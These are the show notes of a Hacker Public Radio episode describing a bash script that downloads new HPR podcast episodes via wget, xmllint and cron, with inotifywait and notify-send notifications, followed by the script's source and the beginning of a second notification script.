<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

</p>

<p>
01 Introduction</p>

<p>

</p>

<p>
In this episode I will describe techniques for downloading podcasts using basic shell commands such as wget. </p>

<p>
I will illustrate this using a bash script that can be used to download HPR podcasts.</p>

<p>
Even if you do not have any interest in downloading your podcasts using this method, you may find some of the methods useful or interesting.</p>

<p>
It is the principles that are discussed here that are important, rather than the implementation. </p>

<p>

</p>

<p>
02</p>

<p>
I realize that there are already a number of different podcast download programs available,  including at least one written in bash. </p>

<p>
However, you may feel that none of these suit how you wish to do things and want to create your own system tailored to your specific needs.</p>

<p>
If so, then I hope the following is of some use to you.</p>

<p>
If not, then you may still find some of the things discussed here to still be of interest.</p>

<p>

</p>

<p>
Some of the subjects I cover include</p>

<p>
wget to a user defined file name.</p>

<p>
parsing xml with xmllint.</p>

<p>
using inotifywait to trigger an action when a file is created or modified.</p>

<p>
using notify-send to send a message to the notification area.</p>

<p>
and</p>

<p>
a way of allowing a cron job to send a message to the user interface.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
03 Background</p>

<p>

</p>

<p>
There has been an ongoing discussion in comments to some HPR episodes about problems downloading HPR podcast episodes. </p>

<p>
Apparently some people have been experiencing problems with the way the episode URLs are structured. </p>

<p>

</p>

<p>
04</p>

<p>
I am afraid that I don't fully understand the nature of these problems, so I won't  be addressing that problem directly.</p>

<p>
Instead, I will present a bash script that I have written which can be used to download HPR podcasts.</p>

<p>
This bash script can be run using cron to automatically fetch new HPR podcasts and save them to a designated directory.</p>

<p>
This is a simplified version of a script that I have used for years to download HPR and other podcasts.</p>

<p>

</p>

<p>
05</p>

<p>
I won't try to read the full bash script out in this podcast, as that would be a bit dull to listen to.</p>

<p>
I will instead describe what each section does and why I chose to do things that way.</p>

<p>
Perhaps other people can offer suggestions of better ways to do things.</p>

<p>
I will post the full bash script in the show notes.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
06 Fetching Podcasts</p>

<p>

</p>

<p>
The standard way of distributing podcasts is to publish an RSS feed containing URL links to the audio files.</p>

<p>
RSS is a very long established and widely supported mechanism for this and other purposes.</p>

<p>
An RSS feed is basically an XML document which can be accessed over HTTP.</p>

<p>
These URLs contained in the RSS XML document can then be used to download the actual audio files, such as MP3 or OGG files.</p>

<p>

</p>

<p>
07</p>

<p>
Basically what we need to do is the following</p>

<p>

</p>

<p>
• Download the RSS XML document.</p>

<p>
• Extract the URL links to the audio files.</p>

<p>
• Compare the list of these links to a previously saved list to see which ones are new and which ones are ones that we previously downloaded.</p>

<p>

</p>

<p>
08</p>

<p>
• Make a list of the new URLs.</p>

<p>
• Go through this list of new URLs and download each of the new audio files.</p>

<p>
• Check to see that we actually received the new audio file.</p>

<p>
• Add the URLs of the files we successfully downloaded to our saved list of podcast URLs</p>

<p>

</p>

<p>
09</p>

<p>
In addition to this, we would like to have the above happen automatically in the background without our having to take any action on our own.</p>

<p>
We may wish to receive a notification of when a new podcast has arrived however.</p>

<p>
We would probably also wish to receive notification of any errors or failures.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
10 Fetching Podcasts - The Preliminaries</p>

<p>

</p>

<p>
Our desire to be able to run the script automatically imposes some requirements on our solution.</p>

<p>
To schedule the script we will use cron.</p>

<p>
Cron is a Linux facility to run scripts on a schedule.</p>

<p>

</p>

<p>
11</p>

<p>
One of the side effects of using cron however is  that we need to specify the full path to the locations where we intend to keep any data files, plus also the full path to where we intend to put the downloaded podcasts.</p>

<p>

</p>

<p>
12</p>

<p>
So the first thing we need to do in our script is to specify a number of different values for things like file location, the URL for the HPR RSS feed, and several other things as well.</p>

<p>

</p>

<p>
I will skip over the details of these, although I may make reference to them later.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
13 Get the RSS Data</p>

<p>

</p>

<p>
The first thing of real substance to do is to fetch the current RSS feed data.</p>

<p>
I have put this in a bash function called getrssurldata</p>

<p>

</p>

<p>
The contents of this function are a one liner, but with a number of elements chained together through pipes.</p>

<p>

</p>

<p>
14 Downloading the RSS XML Document</p>

<p>
• First we use wget, which is a standard command on most Linux distros.</p>

<p>
• We specify four things.</p>

<p>
• First we set a timeout. I have chosen 20 seconds.</p>

<p>
• Next we set the retry limit. I have chosen 3.</p>

<p>

</p>

<p>
15</p>

<p>
• Then we specify that the output of wget is sent to stdout rather than saved as a file.</p>

<p>
• This is done by using the -O option followed by a space and then a dash.</p>

<p>
• The O option is usually used to specify a file to save the output to, but when used with a dash causes output to go to stdout.</p>

<p>
• Then we specify the URL of the HPR RSS feed.</p>

<p>

</p>

<p>
16 Contents of the XML Document</p>

<p>
This gives us the HPR RSS XML document. </p>

<p>
There are about 5,000 lines in this RSS document.</p>

<p>
Most of those lines are the show notes which are also included in the feed.</p>

<p>

</p>

<p>
17 Extracting the Podcast Episode URLs</p>

<p>
There are only 10 lines of the document that contain information that we are interested in however.</p>

<p>
These lines are enclosed in "enclosure" XML tags. </p>

<p>
We just need to find those lines and separate out the URLs</p>

<p>

</p>

<p>
18 Standard Command Line Tools</p>

<p>
There are two ways that we can do this.</p>

<p>
One is to use a combination of grep, sed, and cut.</p>

<p>
Grep can find the lines containing the enclosure tags.</p>

<p>
Sed and cut can extract the URL from the surrounding extraneous data. </p>

<p>

</p>

<p>
19</p>

<p>
However, this method does not discriminate between real enclosure tags in the data portion of the RSS feed and enclosure tags in the show notes which are included in the feed from episodes such as this one.</p>

<p>
This may be an acceptable problem in practical terms, but we can do better.</p>

<p>

</p>

<p>
20 Using an XML Parser</p>

<p>
The other method is to actually parse the XML document.</p>

<p>
there are at least two command line XML parsers that I am aware of.</p>

<p>
These are "xmllint", and "xlmstarlet".</p>

<p>
I have used xmllint in this example.</p>

<p>
I have not used xmlstarlet, so I can't offer any comment on how easy or difficult to use it is.</p>

<p>

</p>

<p>
21</p>

<p>
I won't give a detailed explanation of all the things that xmllint can do.</p>

<p>
It has many features, most of which, as the name suggests, have to do with finding formatting problems with the XML itself.</p>

<p>
Describing everything it can do would be at least one episode in itself. </p>

<p>
I will instead just give the particular command used and explain each element of it.</p>

<p>

</p>

<p>
22</p>

<p>
In this example assume that we are piping the output of wget directly into xmllint.</p>

<p>
The complete command is</p>

<p>

</p>

<p>
xmllint --xpath "//channel/item/enclosure/@url" - | cut -d'"' -f2</p>

<p>

</p>

<p>
23</p>

<p>
In this example,</p>

<p>
xmllint is the name of the command.</p>

<p>
--xpath tells it to parse the document according to the string which follows.</p>

<p>
"//channel/item/enclosure/@url" tells it to find a series of tags in the hierarchy of channel, followed by item, followed by enclosure, and then extract the url attribute from the enclosure tag.</p>

<p>
The "-" which follows tells it to look for input from stdin rather than from a file.</p>

<p>

</p>

<p>
24</p>

<p>
The result is a string which has the url attribute name, an equal sign, and the URL that we want enclosed in quotes.</p>

<p>
To get just the URL itself, we pipe the output from xmllint into cut, using the doublequote characters as delimiters.</p>

<p>
We then save the result in a temporary file.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
25 Finding the New Episodes</p>

<p>

</p>

<p>
Next we wish to find the new podcast episodes.</p>

<p>
Each HPR episode is identified by a unique URL.</p>

<p>
This means that if we save the URLs of episodes that we have already downloaded, we just have to look for the URLs that do not appear in this saved list.</p>

<p>

</p>

<p>
https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4659/hpr4659.mp3</p>

<p>

</p>

<p>
26</p>

<p>
The easiest way to do this is to take our two lists of URLs, sort each into temporary files, and then compare the sorted URLs using the "comm" command.</p>

<p>

</p>

<p>
27</p>

<p>
This is simple, but has a drawback.</p>

<p>
Some podcasts occasionally change distributors.</p>

<p>
When they do this, the old podcasts are re-published with new URLs and you end up downloading a lot of old episodes over again.</p>

<p>

</p>

<p>
28</p>

<p>
With HPR we could get around this by extracting just the file name and looking for that instead of the full URL.</p>

<p>

</p>

<p>
I will however leave that problem as an exercise for the student and just accept that if the URL format changes we may end up downloading old episodes over again.</p>

<p>
Since the feed has a maximum of only 10 episodes in it however, that isn't really that big of a problem.</p>

<p>
It would be more of a problem with podcasts which have very large numbers of episodes in their feed, but the solutions to those will be feed specific. </p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
29 Downloading the New Podcasts</p>

<p>

</p>

<p>
We should now have a list of URLs for the new podcasts we do not already have. </p>

<p>
Typically this should be only one file, but there could be several, or even as many as 10, if we have not turned on our computer in a while.</p>

<p>

</p>

<p>
Therefore, we need to iterate through the file of new podcast URLs and download each one.</p>

<p>

</p>

<p>
30</p>

<p>
Before we do that however, we should check to see if there is in fact anything new to download.</p>

<p>
To do this, simply use "wc -l" to count the number of lines in the list of new URLs and save the resulting number.</p>

<p>

</p>

<p>
31</p>

<p>
If this number is zero, there is nothing to download, we can skip the download step. </p>

<p>
As an additional check, we should see if the number of downloads exceeds some threshold value that we wish to set.</p>

<p>
This is not a major problem with HPR, but some podcasts have hundreds of files in their RSS feed rather than just the most recent ones.</p>

<p>
If we do exceed our download limit, then we need to log an error and skip downloading. </p>

<p>

</p>

<p>
32</p>

<p>
Assuming there are no problems so far however, the first thing we need to do is to extract the name of the audio file from the URL.</p>

<p>
We can do that using the "basename" command.</p>

<p>
We will use this to specify the name that we use when we save the audio file. </p>

<p>

</p>

<p>
33</p>

<p>
HPR has a very well formed file name. </p>

<p>
Some podcasts do not however, and for those you would need to construct some sort of suitable name either using information found in the URL or simply creating a name using a time stamp. </p>

<p>

</p>

<p>
34</p>

<p>
Next we download the audio file using wget.</p>

<p>

</p>

<p>
This is similar to how we downloaded the RSS feed, but with a few changes.</p>

<p>
One is that I have increased the timeout to 90 seconds. </p>

<p>
This may not have been necessary, but seemed like a good idea.</p>

<p>

</p>

<p>
35</p>

<p>
The next is that when specifying the output file name using -O, we use the file name we extracted from the URL.</p>

<p>

</p>

<p>
The third is that we specify a destination directory using the -P option. </p>

<p>

</p>

<p>
36</p>

<p>
After wget has finished, including any retries that it had to do, we next check that the expected new file is both present and not empty.</p>

<p>
We did this using an "if" statement with the "-s" option.</p>

<p>

</p>

<p>
If the file was found and not zero, then we add that URL to a temporary list of downloaded URLs.</p>

<p>

</p>

<p>
37</p>

<p>
If the file was not present, or was zero length, we output an error message to an error log. </p>

<p>
I will come back to this point later.</p>

<p>

</p>

<p>
38</p>

<p>
Next, if there is more that one podcast to download we sleep for 3 seconds. </p>

<p>
While not strictly necessary, it is considered to be "polite" to not hammer a server repeatedly, but rather to put a small delay between file downloads..</p>

<p>

</p>

<p>
39</p>

<p>
After we have downloaded all the audio files in our list, we can add the list of URLs for the files downloaded to the permanent list.</p>

<p>
While we are at it, we should use "tail" to trim the permanent log to keep it from growing indefinitely.</p>

<p>
This limit should be several times bigger than the number of files in the RSS feed. </p>

<p>
In this case I selected 50. </p>

<p>

</p>

<p>
40</p>

<p>
Finally we write any errors to the permanent error log, and also write these same errors to another file used to signal errors for display to the user.</p>

<p>

</p>

<p>
We have now successfully downloaded at least one HPR podcast.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
41 Notify the User of Events</p>

<p>

</p>

<p>
It would be convenient to be informed of new podcast downloads when they occur, and also be notified of any errors.</p>

<p>

</p>

<p>
One of the limitations of cron jobs is that they cannot access the user interface.</p>

<p>
This means that we cannot readily send a message directly to the notification system to inform the user of the presence of new podcasts or of errors.</p>

<p>

</p>

<p>
42 inotifywait</p>

<p>
The solution to this is to use "inotifywait" to monitor particular files and directories for changes.</p>

<p>

</p>

<p>
The man page for inotifywait states the following - </p>

<p>

</p>

<p>
43</p>

<p>
inotifywait  efficiently  waits for changes to files using Linux's inotify(7) interface.  It is suitable for waiting  for  changes  to  files from  shell  scripts.  It can either exit once an event occurs, or continually execute and output events as they occur.</p>

<p>

</p>

<p>
End of quote.</p>

<p>

</p>

<p>
44</p>

<p>
In many Linux distros, inotifywait is provided by the "inotify-tools" package.</p>

<p>

</p>

<p>
I won't go over all the features of inotifywait. </p>

<p>
Instead, I will just describe how to use it for our purposes here.</p>

<p>

</p>

<p>
45 inotifywait Modes</p>

<p>

</p>

<p>
I should point out first though that inotifywait operates in two different modes.</p>

<p>
In the normal default mode, it exits after being triggered by an event and must be re-established again in order to resume monitoring.</p>

<p>
In monitor mode, which is enabled by using the "-m" option, it runs indefinitely, responding to events.</p>

<p>
I will use the default mode here.</p>

<p>

</p>

<p>
46</p>

<p>
The man page for inotifywait provides a simple example that we could copy and modify for our purposes.</p>

<p>
A great many examples that you  will find are based on this example.</p>

<p>
However, it doesn't quite do what we want, so we need to change a few things.</p>

<p>

</p>

<p>
47 podfetchnotify</p>

<p>
The first shell script is one which monitors for the arrival of new podcasts and sends a notification to the user.</p>

<p>
I will call this "podfetchnotify".</p>

<p>
The complete scripts are in the show notes, I will just provide a brief description here.</p>

<p>

</p>

<p>
48 Setting Up Event Watches Using  inotifywait</p>

<p>
The script is enclosed in a while loop which run indefinitely.</p>

<p>
In the first line inside the while loop, we call inotifywait.</p>

<p>
inotifywait will then block until the event it is told to look for occurs.</p>

<p>
In short, execution of the script will wait there until an event occurs.</p>

<p>

</p>

<p>
49</p>

<p>
The names of the events are listed in the man file.</p>

<p>
In this case we are looking for "modify", "create", and "moved_to".</p>

<p>
Each of these does pretty much as you would expect, reacting to modifying an existing file, creating a new file, or moving a file to that directory.</p>

<p>

</p>

<p>
50 Problems When Testing Using Text Editors</p>

<p>
I should point out that if you are testing a script which uses inotifywait, then modifying a file with a text editor may not produce the results that you may think it would. </p>

<p>
Instead it treats this as a new file with the same name, with the original file being erased.</p>

<p>
Since inotifywait attaches itself to the inode rather than the filename, it sees the file that the text editor changed as being a new file.</p>

<p>
If you wish to test this realistically, then use "echo" to overwrite the file by using I/O redirection.</p>

<p>

</p>

<p>
51 Capturing Output</p>

<p>
In my example I capture the output from standard out into a variable, but I don't do anything with it.</p>

<p>
If you wish to for example display the name of the newly downloaded podcast file, then use the --format option along with an appropriate formatting code. </p>

<p>
There are details about this in the man page.</p>

<p>

</p>

<p>
On the next line we capture the exit code using "$?"</p>

<p>

</p>

<p>
52 Responding to Exit Codes</p>

<p>
If the exit code was zero, then a monitored event was triggered and there should a new podcast in the directory.</p>

<p>
In this case we display a message indicating that a new podcast has arrived.</p>

<p>
I will describe how to send notifications shortly. </p>

<p>

</p>

<p>
If the exit code was not zero, then an error occurred.</p>

<p>
An example of such an error would be if the directory were not present when monitoring was started.</p>

<p>
In this case we display a message indicating that a fatal error has occurred and then exit.</p>

<p>

</p>

<p>
53 Delay for More Podcasts</p>

<p>
Finally, we use "sleep" to wait for some arbitrary period of time to prevent notifications from being triggered multiple times if several podcasts were being downloaded in succession.</p>

<p>
In this case I chose to wait for 60 seconds.</p>

<p>

</p>

<p>
54</p>

<p>
We have now completed the process and can return to the top of the loop and resume waiting using inotifywait.</p>

<p>

</p>

<p>
55 Sending Notifications to the User</p>

<p>
I mentioned above about sending notification messages to the user.</p>

<p>
In the Gnome desktop, notification messages appear from the centre of the top bar in a list.</p>

<p>
Other desktops or operating systems may have something similar.</p>

<p>

</p>

<p>
56</p>

<p>
To send a notification message to the notification area, you use the "notify-send" command.</p>

<p>
Simply follow notify-send with a quoted string and it will be displayed in the notification area. </p>

<p>

</p>

<p>

</p>

<p>
57 podfetcherrornotify</p>

<p>
The second shell script is one which notifies the user of errors.</p>

<p>
I will call this "podfetcherrornotify".</p>

<p>
With this shell script we set up a watch on a file which contains any error messages from podfetch.</p>

<p>
This script is very similar to podfetchnotify.</p>

<p>

</p>

<p>
58</p>

<p>
The exceptions are</p>

<p>
With inotifywait we only monitor for "modify".</p>

<p>
There is no sleep command at the end of the loop.</p>

<p>
Instead we sleep for a few seconds just after getting the exit code from inotifywait.</p>

<p>
This helps prevent problems caused by race conditions.</p>

<p>

</p>

<p>
59</p>

<p>
Next we check the inotifywait exit code.</p>

<p>
If it was zero, then we read the error report file and send a notification message to the user containing that error message.</p>

<p>

</p>

<p>
60</p>

<p>
If it was not zero, then we check to make sure that the directory that should contain the error log exists.</p>

<p>
If it does not exist, then we send a notification message to that effect to the user and terminate the script.</p>

<p>

</p>

<p>
61</p>

<p>
If the directory exists, then we check to see if the error message file used for signalling exists.</p>

<p>
If the file does not exist, then we create it.</p>

<p>

</p>

<p>
62</p>

<p>
One of the reasons for an inotifywait error is that if the file that it is told to monitor does not exist, it cannot set up a watch condition.</p>

<p>
By creating the file we correct the cause of the error and allow  inotifywait to operate normally.</p>

<p>

</p>

<p>
63</p>

<p>
Finally we increment an error counter and check to see if the limit is exceeded.</p>

<p>
If there are excessive errors, then send a notification message to the user and exit.</p>

<p>
The reason for this is to give the user an indication that the error notifications are not working for some reason and there may be a problem that needs looking into.</p>

<p>

</p>

<p>
64</p>

<p>
The error counter is reset every time the inotifywait exit status is ok, so occasional unexpected glitches should be something that is ignored.</p>

<p>
Of course podcast fetching errors are something that will probably happen only rarely if at all, so this final step may be seen as an unnecessary embellishment. </p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
65 Installing the Scripts</p>

<p>

</p>

<p>
Next I will describe how to install and prepare the scripts to run.</p>

<p>
We need to perform the following steps.</p>

<p>

</p>

<p>
66</p>

<p>
• First, we need to create a directory to hold the scripts and their associated data files.</p>

<p>
• Next we need to create a directory to hold the downloaded podcasts.</p>

<p>
• Then we must copy the scripts to these directories and make them executable. </p>

<p>
• Then, we must edit the scripts to have the file path in the script match the locations of the new directories that we created.</p>

<p>

</p>

<p>
67</p>

<p>
• Then we need to install xmllint, or alternatively modify the download script to comment out the use of xmllint and enable the alternative method using grep and sed instead.</p>

<p>
• Then we need to run each script manually from the command line to check for errors.</p>

<p>
• If podfetch ran correctly, it should download the most recent 10 podcasts during this test.</p>

<p>

</p>

<p>
68 Adding podfetch to the Crontab</p>

<p>
The above describes how to run the scripts manually.</p>

<p>
In order to fetch podcasts automatically, we need to add the podfetch script to the cron schedule.</p>

<p>
To do this, open a terminal.</p>

<p>

</p>

<p>
69</p>

<p>
Type "crontab -e", and then press return.</p>

<p>
A text editor should open up containing the crontab file.</p>

<p>
On Ubuntu, this editor is GNU nano.</p>

<p>
Enter the appropriate cron parameters.</p>

<p>
I will provide an example here for running it 12 minutes past the hour every three hours.</p>

<p>

</p>

<p>
70</p>

<p>
12 */3 * * *  /home/username/pathtofiles/podfetch.sh</p>

<p>

</p>

<p>
71</p>

<p>
I won't explain cron in detail here.</p>

<p>
The example that I have just given should be good enough for most people.</p>

<p>
The "*/3" parameter will cause it to run every three hours.</p>

<p>
The "12" parameter will cause it to run 12 minutes past the hour when it does run.</p>

<p>

</p>

<p>
72</p>

<p>
Checking every three hours should be good enough for most people, but you can adjust that as you see fit.</p>

<p>
I would recommend however that you don't check more frequently than once per hour.</p>

<p>
Checking more frequently than necessary puts extra load on the distribution servers. </p>

<p>
It is very unlikely that you really do need each new episode the moment it is available. </p>

<p>

</p>

<p>
73</p>

<p>
I would also recommend changing the "12" parameter to some other random minute value.</p>

<p>
I would suggest avoiding on the hour or on the half hour, as a lot of other people are probably checking at those times, and it would be better to spread the load out more evenly over time.</p>

<p>

</p>

<p>
74</p>

<p>
The file path parameter should of course match the actual path to wherever you have located the script, including the correct user name.</p>

<p>

</p>

<p>
75 Making the Notification Scripts Start Automatically</p>

<p>
The two notification scripts can be made to start automatically.</p>

<p>
The exact method to do this may vary according to distribution or desktop.</p>

<p>

</p>

<p>
76</p>

<p>
On Ubuntu this is done using the Startup Applications Preferences GUI program, which should come already installed.</p>

<p>

</p>

<p>
77</p>

<p>
I won't go into details on this here, it should be fairly self evident how to use it once you see it.</p>

<p>
What this program does is to create ".desktop" files in the ".config/autostart" directory in your home directory.</p>

<p>

</p>

<p>
78</p>

<p>
These ".desktop" files are all run automatically on start up.</p>

<p>
Once you have added the notification scripts, you will need to log out and then log back in to make them active.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
79 Conclusion</p>

<p>

</p>

<p>
I this episode I explained how to write a set of simple shell scripts to automatically download each new episode of HPR as it comes out and to notify you of its arrival. </p>

<p>

</p>

<p>
80</p>

<p>
The download script described here is tailored specifically for use with HPR only.</p>

<p>
However, it was derived from a larger script that downloaded other podcasts as well, based on information read in from a text file.</p>

<p>
If you are feeling ambitious, you can add those features back into this to handle all of the podcasts that you listen to.</p>

<p>

</p>

<p>
81</p>

<p>
In a comment to another episode of HPR I had said that I would cover ID3 tags in MP3 files, but this episode is long enough now, so I will leave that subject for later.</p>

<p>

</p>

<p>
I look forward to seeing you again later on another episode of Hack Public Radio.</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
podfetchdownloader</p>

<p>

</p>

<p>
#!/bin/bash</p>

<p>

</p>

<p>
# Fetch pending HPR podcasts listed in the HPR RSS feed.</p>

<p>
# 8-Jun-2026</p>

<p>
# Licensed under GPLv3 or later.</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>

</p>

<p>
# Today's date and time as YYYYMMDDHHMMSS. </p>

<p>
podttimestamp=$( date +"%Y%m%d%H%M%S" )</p>

<p>

</p>

<p>
# The absolute path to the script. This is necessary when running it</p>

<p>
# using a cron job.</p>

<p>
podpath="/home/me/Apps/hprfetch"</p>

<p>

</p>

<p>
# This is the absolute path to where to store the podcast files.</p>

<p>
podfilepath="/home/me/Music/Podcasts/HPR"</p>

<p>

</p>

<p>
# Create the full path names here for all the text files used.</p>

<p>
podcastsfetched="$podpath/podcastsfetched.txt"</p>

<p>
poderrorslog="$podpath/poderrorslog.txt"</p>

<p>
poderrorsreport="$podpath/poderrorsreport.txt"</p>

<p>

</p>

<p>
tmpoldurlssorted="$podpath/tmpoldurlssorted.txt"</p>

<p>
tmppodsnew="$podpath/tmppodsnew.txt" </p>

<p>
tmppodstodownload="$podpath/tmppodstodownload.txt" </p>

<p>
tmppodserrors="$podpath/tmppodserrors.txt" </p>

<p>
tmppodcastsfetched="$podpath/tmppodcastsfetched.txt"</p>

<p>
tmplog="$podpath/tmplog.txt"</p>

<p>

</p>

<p>
# The URL for the HPR RSS feed.</p>

<p>
PodURL="http://hackerpublicradio.org/hpr_rss.php"</p>

<p>

</p>

<p>
# Limit on number of podcasts to download.</p>

<p>
DownloadLimit=11</p>

<p>

</p>

<p>
# Name of the podcast.</p>

<p>
PodName="Hacker Public Radio"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Check if the required paths exist.</p>

<p>
# If this path does not exist, cannot log the error.</p>

<p>
if [[ ! -d "$podpath/" ]]; then</p>

<p>
	echo "$podttimestamp Error - Could not find $podfilepath."</p>

<p>
	exit 1</p>

<p>
fi</p>

<p>

</p>

<p>
# Where to store the podcast file fetched.</p>

<p>
if [[ ! -d "$podfilepath/" ]]; then</p>

<p>
	echo "$podttimestamp Error - Could not find $podfilepath." &gt;&gt; $tmppodserrors</p>

<p>
	# Copy the errors log from the temporary errors file to the permanent files.</p>

<p>
	LogErrors</p>

<p>
	exit 1</p>

<p>
fi</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Check if the podcast log exists. We read it before we write to it,</p>

<p>
# so it must exist or we will hang on it not being present.</p>

<p>
if [[ ! -e $podcastsfetched ]]; then</p>

<p>
	touch $podcastsfetched</p>

<p>
fi</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Delete the specified files if they exist.</p>

<p>
# This accepts multiple file names in a variable number of parameters.</p>

<p>
CleanupFiles ()</p>

<p>
{</p>

<p>
	# $@ accepts multiple parameters.</p>

<p>
	for f in "$@"; do</p>

<p>
		# Check if the file exists.</p>

<p>
		if [ -e "$f" ]; then</p>

<p>
			rm "$f"</p>

<p>
		fi</p>

<p>
	done</p>

<p>
}</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Copy the errors log from the temporary errors file to the permanent files.</p>

<p>
LogErrors () {</p>

<p>
	if [ -e $tmppodserrors ]; then</p>

<p>
		# The permanent log.</p>

<p>
		cat $tmppodserrors &gt;&gt; $poderrorslog</p>

<p>
		# This file is monitored for display by other scripts.</p>

<p>
		cat $tmppodserrors &gt; $poderrorsreport</p>

<p>
	fi</p>

<p>
}</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>

</p>

<p>
# Get the URL data from an RSS feed</p>

<p>
GetRSSURLData () {</p>

<p>

</p>

<p>
	wget --timeout=20 --tries=3 -O - "$PodURL" \</p>

<p>
	| xmllint --xpath "//channel/item/enclosure/@url" - | cut -d'"' -f2 \</p>

<p>
	| sort &gt; $tmppodsnew</p>

<p>

</p>

<p>
	# This is an alternate method that does not use xmllint.</p>

<p>
	# However, it is not as robust. If someone were to include the</p>

<p>
	# first grep search pattern in their show notes, then it would</p>

<p>
	# look for that as a valid tag and output the following text</p>

<p>
	# as a URL.</p>

<p>
	#wget --timeout=20 --tries=3 -O - "$PodURL" | grep "&lt;enclosure url=" \</p>

<p>
	#	| sed -n 's/^.*enclosure//p' | sed -n 's/^.*url=//p' \</p>

<p>
	#	| cut -d'"' -f2 | sort &gt; $tmppodsnew</p>

<p>

</p>

<p>

</p>

<p>
}</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Find which podcasts we do not already have.</p>

<p>
FindNewPodcasts () {</p>

<p>

</p>

<p>

</p>

<p>
	cat $podcastsfetched | sort &gt; $tmpoldurlssorted</p>

<p>
	comm -13 $tmpoldurlssorted $tmppodsnew &gt; $tmppodstodownload</p>

<p>

</p>

<p>
	rm $tmpoldurlssorted</p>

<p>

</p>

<p>
}</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Download the podcasts.</p>

<p>
DownloadPodcasts() {</p>

<p>

</p>

<p>
	# Clear out previous temporary list of downloaded podcasts.</p>

<p>
	true &gt; $tmppodcastsfetched</p>

<p>

</p>

<p>

</p>

<p>
	for i in $( cat $tmppodstodownload )</p>

<p>
	do</p>

<p>

</p>

<p>
		# Extract the file name from the URL.</p>

<p>
		fname=$( basename $i )</p>

<p>
		outputpodname="$podfilepath/$fname"</p>

<p>

</p>

<p>
		# Download the file.</p>

<p>
		wget --timeout=90 --tries=3 -P $podfilepath $i -O "$outputpodname"</p>

<p>

</p>

<p>
		# Check if the file exists and is not empty.</p>

<p>
		if [[ -s "$outputpodname" ]]; then</p>

<p>
			echo $i &gt;&gt; $tmppodcastsfetched</p>

<p>
		else</p>

<p>
			echo "$podttimestamp Error - $outputpodname was not found or is empty." &gt;&gt; $tmppodserrors</p>

<p>
		fi</p>

<p>

</p>

<p>

</p>

<p>
		# Delay a reasonable length of time between multiple downloads.</p>

<p>
		if (( $PodCount &gt; 1 )); then </p>

<p>
			sleep 3</p>

<p>
		fi</p>

<p>

</p>

<p>
	done</p>

<p>

</p>

<p>
	# Add the list of files downloaded to the log.</p>

<p>
	# Check if the list exists and is not empty.</p>

<p>
	if [ -s $tmppodcastsfetched ]; then</p>

<p>
		cat $tmppodcastsfetched &gt;&gt; $podcastsfetched</p>

<p>
		# Trim the log file to keep it from growing indefinitely.</p>

<p>
		tail -n50 $podcastsfetched &gt; $tmplog</p>

<p>
		mv $tmplog $podcastsfetched</p>

<p>
	fi</p>

<p>

</p>

<p>
	# Remove the tmp file now that we are done with it.</p>

<p>
	rm $tmppodcastsfetched</p>

<p>

</p>

<p>
}</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Clean up any left over files.</p>

<p>
CleanupFiles "$tmppodsnew" "$tmppodstodownload" "$tmppodserrors" "$tmppodcastsfetched"</p>

<p>

</p>

<p>

</p>

<p>
# Get the RSS data.</p>

<p>
GetRSSURLData</p>

<p>

</p>

<p>
# Find which podcasts are new.</p>

<p>
FindNewPodcasts</p>

<p>

</p>

<p>
# Count how many new podcasts there are.</p>

<p>
PodCount=$( cat $tmppodstodownload | wc -l )</p>

<p>

</p>

<p>

</p>

<p>
# If no podcasts to download, skip this.</p>

<p>
# If too many podcasts for this feed, then log an error and skip.</p>

<p>
# This error will keep repeating until something is done about it.</p>

<p>
if (( $PodCount &gt; 0 )); then </p>

<p>
	if (( $PodCount &gt; $DownloadLimit )); then </p>

<p>
		echo "$podttimestamp Too many podcasts for $PodName : $PodCount." &gt;&gt; $tmppodserrors		</p>

<p>
	else</p>

<p>
		# Download the podcasts listed in the temp file.</p>

<p>
		DownloadPodcasts</p>

<p>
	fi</p>

<p>
fi</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Copy the errors log from the temporary errors file to the permanent files.</p>

<p>
LogErrors</p>

<p>

</p>

<p>
# Clean up temp files.</p>

<p>
CleanupFiles "$tmppodsnew" "$tmppodstodownload" "$tmppodserrors" "$tmppodcastsfetched"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
END OF FIRST SHELL SCRIPT</p>

<p>

</p>

<p>

</p>

<p>
START OF SECOND SHELL SCRIPT</p>

<p>

</p>

<p>
podfetchnotify</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
#!/bin/bash</p>

<p>

</p>

<p>
# Part of Podfetch.</p>

<p>
# This monitors for new files appearing in the new podcasts directory.</p>

<p>
# This should be run as a background task.</p>

<p>
# Install it using the "Startup Applications" utility in Ubuntu.</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Path where new podcasts are to be stored.</p>

<p>
podfilepath="/home/me/Music/Podcasts/HPR"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Wait for the podcast directory to be modified.</p>

<p>
while true; do</p>

<p>

</p>

<p>
	# Check for new files.</p>

<p>
	errmsg=$( inotifywait -e modify -e create -e moved_to $podfilepath )</p>

<p>
